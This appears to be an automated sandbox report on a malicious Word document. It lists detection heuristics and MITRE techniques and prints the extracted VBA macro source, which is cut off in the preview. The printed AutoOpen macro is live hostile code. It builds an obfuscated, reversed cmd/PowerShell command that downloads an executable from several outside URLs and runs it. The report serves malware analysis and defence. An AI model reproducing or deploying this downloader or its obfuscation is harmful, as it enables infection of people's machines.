MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Word document containing a VBA macro. The AutoOpen macro is present and attempts to execute a command using Shell. The macro appears to be obfuscated, making it difficult to determine the exact command being executed. The presence of the AutoOpen macro and the attempt to execute a command strongly suggest a malicious intent, likely to download and execute a second-stage payload.
Heuristics 5
-
ClamAV: Doc.Malware.00536d-6691462-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.00536d-6691462-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5009 bytes |
SHA-256: b75b17cfbe21736afbbd942ae691753e722a2d18f4fd9477a4d3edbf8e71e578 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "JGrzSLnh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Const UbJHpY = 0
Dim ZFpqa(5)
ZFpqa(0) = Mid(UrlzZV, 83, 143)
ZFpqa(1) = Mid(UrlzZV, 83, 143)
ZFpqa(2) = MidB(KwWLIYV, 2, 943)
ZFpqa(3) = Right(QzcsN, 271)
ZFpqa(4) = Right(QzcsN, 271)
Dim kPzzJ(2)
kPzzJ(0) = Left(mMIojQ, 128)
kPzzJ(1) = Right(QzcsN, 271)
Dim qLZzHV(4)
qLZzHV(0) = Right(QzcsN, 271)
qLZzHV(1) = Left(mMIojQ, 128)
qLZzHV(2) = Mid(UrlzZV, 83, 143)
qLZzHV(3) = Right(QzcsN, 271)
Dim XjvTX(3)
XjvTX(0) = Right(QzcsN, 271)
XjvTX(1) = Right(QzcsN, 271)
XjvTX(2) = Left(mMIojQ, 128)
Dim iMfkf(2)
iMfkf(0) = Mid(UrlzZV, 83, 143)
iMfkf(1) = Left(mMIojQ, 128)
Dim ZPajo(2)
ZPajo(0) = MidB(KwWLIYV, 2, 943)
ZPajo(1) = MidB(KwWLIYV, 2, 943)
Dim OBGcm(3)
OBGcm(0) = MidB(KwWLIYV, 2, 943)
OBGcm(1) = Right(QzcsN, 271)
OBGcm(2) = MidB(KwWLIYV, 2, 943)
Shell@ znTPdbX + mBYjUWTQKAI + oUCbzPVliID, UbJHpY
Dim PEDFPd(3)
PEDFPd(0) = Left(mMIojQ, 128)
PEDFPd(1) = Right(QzcsN, 271)
PEDFPd(2) = Mid(UrlzZV, 83, 143)
Dim zjjpiw(2)
zjjpiw(0) = MidB(KwWLIYV, 2, 943)
zjjpiw(1) = Left(mMIojQ, 128)
End Sub
Attribute VB_Name = "VjXpvlvYEoCNoI"
Function znTPdbX()
Dim iFQoTi(2)
iFQoTi(0) = Right(QzcsN, 271)
iFQoTi(1) = MidB(KwWLIYV, 2, 943)
Dim FBDjz(4)
FBDjz(0) = MidB(KwWLIYV, 2, 943)
FBDjz(1) = MidB(KwWLIYV, 2, 943)
FBDjz(2) = Left(mMIojQ, 128)
FBDjz(3) = Right(QzcsN, 271)
DErPCfhjTsT = Chr(Format(14 + 5 + 18 + 2 + 60)) + "md /V:/" + Chr(Format(9 + 3 + 12 + 1 + 42)) + Chr(Format(4 + 1 + 5 + 0 + 24)) + "s^" + "e^t ^x" + Chr(Format(9 + 3 + 12 + 1 + 42)) + "=^ ^ ^ ^" + " ^ ^ ^}^}{^h" + Chr(Format(14 + 5 + 18 + 2 + 60)) + "ta" + Chr(Format(14 + 5 + 18 + 2 + 60)) + "}^;k^" + "a^erb^;^zAz$" + " m^e^t^I-^ek^ovn^I^;)zA^" + "z^$ ,Em^d" + "^$(^eli^F^d^a^o^ln^woD^.v" + Chr(Format(9 + 3 + 12 + 1 + 42)) + "^Z" + "${^yrt^{)" + "u^p^i$" + " n^i^ E^md^$(h" + Chr(Format(14 + 5 + 18 + 2 + 60)) + "a" + "^ero^f^;^'^e^x^e.'^+jV"
Dim mbwsw(4)
mbwsw(0) = Mid(UrlzZV, 83, 143)
mbwsw(1) = Mid(UrlzZV, 83, 143)
mbwsw(2) = Mid(UrlzZV, 83, 143)
mbwsw(3) = Right(QzcsN, 271)
Dim rbLhE(3)
rbLhE(0) = Right(QzcsN, 271)
rbLhE(1) = Right(QzcsN, 271)
rbLhE(2) = Left(mMIojQ, 128)
Dim zfAfjO(4)
zfAfjO(0) = Right(QzcsN, 271)
zfAfjO(1) = Right(QzcsN, 271)
zfAfjO(2) = Mid(UrlzZV, 83, 143)
zfAfjO(3) = MidB(KwWLIYV, 2, 943)
Dim NRUzB(4)
NRUzB(0) = MidB(KwWLIYV, 2, 943)
NRUzB(1) = Left(mMIojQ, 128)
NRUzB(2) = Right(QzcsN, 271)
NRUzB(3) = Mid(UrlzZV, 83, 143)
QvImD = Chr(Format(14 + 5 + 18 + 2 + 60)) + "^$+^'\" + "^'+" + Chr(Format(14 + 5 + 18 + 2 + 60)) + "^i^l^bu^p:vne$" + "^=^zAz$;'8^62^' ^= jV" + Chr(Format(14 + 5 + 18 + 2 + 60)) + "^$^;" + ")^'@^'(t^il^pS^.^'I^4S^W^" + "7/mo" + Chr(Format(14 + 5 + 18 + 2 + 60)) + ".^xe^lfis^l^ume//" + "^:^pt^t^h^@" + "^WpIg7/e^d.^ekt^d^" + "e^ul^-greoj//^:^p^tth@3S^Z" + "Rj/^t^en" + ".in^ikr^b//:"
Dim duEiN(2)
duEiN(0) = Mid(UrlzZV, 83, 143)
duEiN(1) = Right(QzcsN, 271)
Dim JXKiZ(5)
JXKiZ(0) = Right(QzcsN, 271)
JXKiZ(1) = Left(mMIojQ, 128)
JXKiZ(2) = Mid(UrlzZV, 83, 143)
JXKiZ(3) = Right(QzcsN, 271)
JXKiZ(4) = Mid(UrlzZV, 83, 143)
Dim GRhuXt(5)
GRhuXt(0) = Right(QzcsN, 271)
GRhuXt(1) = Mid(UrlzZV, 83, 143)
GRhuXt(2) = MidB(KwWLIYV, 2, 943)
GRhuXt(3) = MidB(KwWLIYV, 2, 943)
GRhuXt(4) = Left(mMIojQ, 128)
vcEmwBYzcf = "p^tt^h@b^b0^L/mo" + Chr(Format(14 + 5 + 18 + 2 + 60)) + ".^p" + "u^org-" + "^dba^l^a//^:pt^t" + "h@^Dv^e/^m^o" + Chr(Format(14 + 5 + 18 + 2 + 60)) + ".^l" + "yd^yn^s//:pt^t^" + "h'^=u^p^i^$^;^tne^"
Dim XrTmE(5)
XrTmE(0) = Left(mMIojQ, 128)
XrTmE(1) = Mid(UrlzZV, 83, 143)
XrTmE(2) = MidB(KwWLIYV, 2, 943)
XrTmE(3) = MidB(KwWLIYV, 2, 943)
XrTmE(4) = Left(mMIojQ, 128)
Dim wQPlU(5)
wQPlU(0) = Mid(UrlzZV, 83, 143)
wQPlU(1) = Left(mMIojQ, 128)
wQPlU(2) = Left(mMIojQ, 128)
wQPlU(3) = MidB(KwWLIYV, 2, 943
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.